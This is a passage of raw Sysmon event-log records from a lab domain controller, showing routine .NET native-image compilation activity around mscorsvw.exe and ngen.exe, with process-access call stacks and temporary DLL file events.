Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A1E7D8C4494A6F0F58F12E0E4551CE5,SHA256=5CAE42C95B80DB99E428404FAAFE2F9C1368C135DF393E106525E3546401C9E4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020117Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:35.143{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f60-0\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll2021-06-23 21:03:35.143 10341000x800000000000000020116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.050{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.034{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:35.034{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A7-60D3-3703-00000000CF01}3936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:35.003{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A6-60D3-3603-00000000CF01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:34.987{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A6-60D3-3603-00000000CF01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:34.987{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A6-60D3-3603-00000000CF01}5708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020174Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.940{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4603-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020173Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.925{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4603-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020172Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.925{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4603-00000000CF01}4476C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020171Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.769{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=420B693452761167FB4C143FC9EB1C77,SHA256=80A56FDF7576A037130DED8C4A4CFA19EE29E4396980C8BADCB13828BB9BA45A,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020170Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.550{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4503-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.534{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4503-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.534{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4503-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.425{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4403-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.409{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4403-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.409{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4403-00000000CF01}4276C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000020164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.347{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4303-00000000CF01}584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.331{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4303-00000000CF01}584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.331{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4303-00000000CF01}584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:36.315{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b94-0\Microsoft.ActiveDirectory.TRLParserInterop.dll2021-06-23 21:03:36.315 10341000x800000000000000020160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:36.175{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.175{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1A8-60D3-4203-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:36.128{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1A8-60D3-4103-00000000CF01}6316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windo